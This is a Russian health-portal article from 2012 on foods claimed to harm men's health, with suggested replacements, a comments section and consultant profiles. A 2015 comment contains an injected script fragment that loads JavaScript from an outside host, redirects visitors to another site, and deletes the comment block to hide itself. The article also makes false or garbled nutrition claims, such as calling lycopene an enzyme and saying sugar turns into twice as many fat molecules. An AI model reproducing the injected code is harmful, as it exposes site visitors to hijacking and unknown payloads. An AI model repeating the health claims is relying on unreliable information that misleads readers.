Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Продукты, которые убивают...  >>  Продукты, которые убивают мужчин
 
Обратная связь
 

Продукты, которые убивают мужчин

Размер шрифта
22 февраля 2012 10:00
  • google_analytics: false
  • Нравится

Путь к его сердцу делает обязательный крюк через ваш разум. Более короткий путь, только через его желудок, может довести вашего любимого до больничной койки. Какие продукты надо исключить из рациона, чтобы ваш мужчина всегда был здоров?


1

Вредные продукты

  1. Жареное мясо

Корочка жареного мяса сплошь состоит из канцерогенов, которые, как известно, повышают риск онкологических и сердечно-сосудистых заболеваний, снижают уровень омега-3 ненасыщенных жирных кислот в организме и повышают уровень холестерина.

  1. Яичница

В одном большом яйце содержится 213 мг холестерина. В яйцах более 60% жиров, 1/3 из них – насыщенные. Они повышают уровень холестерина в крови. Высокий уровень холестерина увеличивает риск атеросклероза и эректильной дисфункции.

1

  1. Переработанное мясо и плавленый сыр

Колбаса и сосиски, как любое промышленно переработанное мясо, а также плавленый сыр, содержат нитрозамины, канцерогены, провоцирующие развитие рака. Нитрозамины способствуют слабоумию. Эти вещества негативно воздействуют и на продукцию спермы, влияют на уровень мужских гормонов в крови, и могут довести до бесплодия.

  1. Сахар

Сахар в пище приводит к избытку глюкозы. А глюкоза – это лишний жир. Большое количество глюкозы в крови немедленно включает механизмы, которые обращают глюкозу в жир. Между прочим, из одной молекулы сахара получается две молекулы жира, и в итоге от сахара мы толстеем быстрее, чем от жиров.

Эти продукты мужчинам есть нельзя, но для того чтобы исключить их из рациона навсегда, мы должны найти им замену.

Полезные продукты

  1. Вместо жареного мяса – жирная морская рыба и помидоры

Дважды в неделю ваш мужчина должен есть морскую жирную рыбу, так как именно такая рыба содержит много омега-3 ненасыщенных жирных кислот, которые выводят холестерин и предотвращают рост раковых клеток.

Помидоры содержат ликопин – красный фермент – защищающий мужскую предстательную железу.

  1. Вместо яичницы – овсянка

Завтрак должен быть здоровым. Овсянка содержит грубое волокно, которое дает огромную пользу мужскому организму: снижает уровень холестерина, выводя его из организма, тем самым защищая сосуды. Овсянка надолго даст ощущение сытости, и мужчина будет полон сил.

1

  1. Вместо сосисок и колбасы – ракушечные морепродукты и грибы

Морепродукты с раковинами (устрицы, мидии) богаты цинком. Этот микроэлемент благоприятно влияет на сперматозоиды, делая их более подвижными и увеличивая не только их скорость, но и количество.

В грибах есть практически весь спектр витаминов группы В, которые принимают прямое участие в функционировании нервной системы и помогают нашим иммунным клеткам бороться с раковыми клетками.



Сюжеты по теме:
Это не по-мужски. Еда, которая убивает мужчин  

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:54

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.